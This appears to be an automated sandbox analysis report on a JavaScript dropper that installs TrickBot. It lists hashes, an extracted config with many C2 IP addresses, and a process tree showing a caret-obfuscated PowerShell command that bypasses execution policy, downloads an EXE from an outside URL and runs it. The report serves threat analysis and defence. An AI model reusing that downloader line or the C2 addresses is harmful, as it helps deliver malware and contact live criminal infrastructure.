Analysis
-
max time kernel
38s -
max time network
103s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
13-01-2021 06:51
Static task
static1
Behavioral task
behavioral1
Sample
wGGlWA9kvQ.js
Resource
win7v20201028
General
-
Target
wGGlWA9kvQ.js
-
Size
30KB
-
MD5
71e84623c9f780a2ae34c49964a1d4fd
-
SHA1
8bab366961bf4363c13b169f086c959ff8515e85
-
SHA256
4bdc0f495dfb6d2425fd712ccdda2d1943c700e3b780c37c1c147462a30c9e30
-
SHA512
f4cd7ccd1bf213e3262e4268b0247466b31e3bed3b3877a54b24e58d6710b6f1e83dce581d6d88ab544382cd6559fca2955e83657fd7801d0852fd00497327eb
Malware Config
Extracted
http://dralex.smartwebsitedesign.com/local.php
Extracted
trickbot
100010
rob35
5.34.180.180:443
64.74.160.228:443
198.46.198.116:443
5.34.180.185:443
107.152.46.188:443
195.123.241.214:443
23.254.224.2:443
107.172.188.113:443
200.52.147.93:443
185.198.59.45:443
45.14.226.101:443
185.82.126.38:443
85.204.116.139:443
45.155.173.248:443
103.91.244.50:443
45.230.244.20:443
45.226.124.226:443
187.84.95.6:443
186.250.157.116:443
186.137.85.76:443
36.94.62.207:443
182.253.107.34:443
180.92.158.244:443
-
autorunName:pwgrab
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 2044 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
TempNeX26.exepid process 836 TempNeX26.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
TempNeX26.exepid process 836 TempNeX26.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2044 powershell.exe 2044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2044 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 844 wrote to memory of 1172 844 wscript.exe cmd.exe PID 844 wrote to memory of 1172 844 wscript.exe cmd.exe PID 844 wrote to memory of 1172 844 wscript.exe cmd.exe PID 1172 wrote to memory of 2044 1172 cmd.exe powershell.exe PID 1172 wrote to memory of 2044 1172 cmd.exe powershell.exe PID 1172 wrote to memory of 2044 1172 cmd.exe powershell.exe PID 1172 wrote to memory of 836 1172 cmd.exe TempNeX26.exe PID 1172 wrote to memory of 836 1172 cmd.exe TempNeX26.exe PID 1172 wrote to memory of 836 1172 cmd.exe TempNeX26.exe PID 1172 wrote to memory of 836 1172 cmd.exe TempNeX26.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\wGGlWA9kvQ.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','%temp%NeX26.exe'); & %temp%NeX26.exe & toMsRYPvmFupWNT2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','C:\Users\Admin\AppData\Local\TempNeX26.exe');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TempNeX26.exeC:\Users\Admin\AppData\Local\TempNeX26.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe4⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\TempNeX26.exeMD5
4f3af3f3c9cc138989d704c9f87046c1
SHA1291ce0a01c87fe31cee6f16ee2f13ff9a3ea1007
SHA2568386cfb3b52b83698f4fa9a1e2589770de50cdddd45fc920cda9e58627a8f465
SHA5121db884d2f976e73541bff1ca179898de58d0f4ede87cb21e64a2030cd668d47fc03d1b912c53bb346abead5d45864673207bb8a0dca158985289da7fe898c5f3
-
C:\Users\Admin\AppData\Local\TempNeX26.exeMD5
4f3af3f3c9cc138989d704c9f87046c1
SHA1291ce0a01c87fe31cee6f16ee2f13ff9a3ea1007
SHA2568386cfb3b52b83698f4fa9a1e2589770de50cdddd45fc920cda9e58627a8f465
SHA5121db884d2f976e73541bff1ca179898de58d0f4ede87cb21e64a2030cd668d47fc03d1b912c53bb346abead5d45864673207bb8a0dca158985289da7fe898c5f3
-
memory/836-12-0x0000000000000000-mapping.dmp
-
memory/844-3-0x0000000002580000-0x0000000002584000-memory.dmpFilesize
16KB
-
memory/1172-2-0x0000000000000000-mapping.dmp
-
memory/1696-14-0x0000000000000000-mapping.dmp
-
memory/2044-5-0x000007FEF5BF0000-0x000007FEF65DC000-memory.dmpFilesize
9.9MB
-
memory/2044-9-0x0000000002020000-0x0000000002021000-memory.dmpFilesize
4KB
-
memory/2044-10-0x000000001C340000-0x000000001C341000-memory.dmpFilesize
4KB
-
memory/2044-8-0x0000000002550000-0x0000000002551000-memory.dmpFilesize
4KB
-
memory/2044-7-0x000000001AC30000-0x000000001AC31000-memory.dmpFilesize
4KB
-
memory/2044-6-0x0000000002400000-0x0000000002401000-memory.dmpFilesize
4KB
-
memory/2044-4-0x0000000000000000-mapping.dmp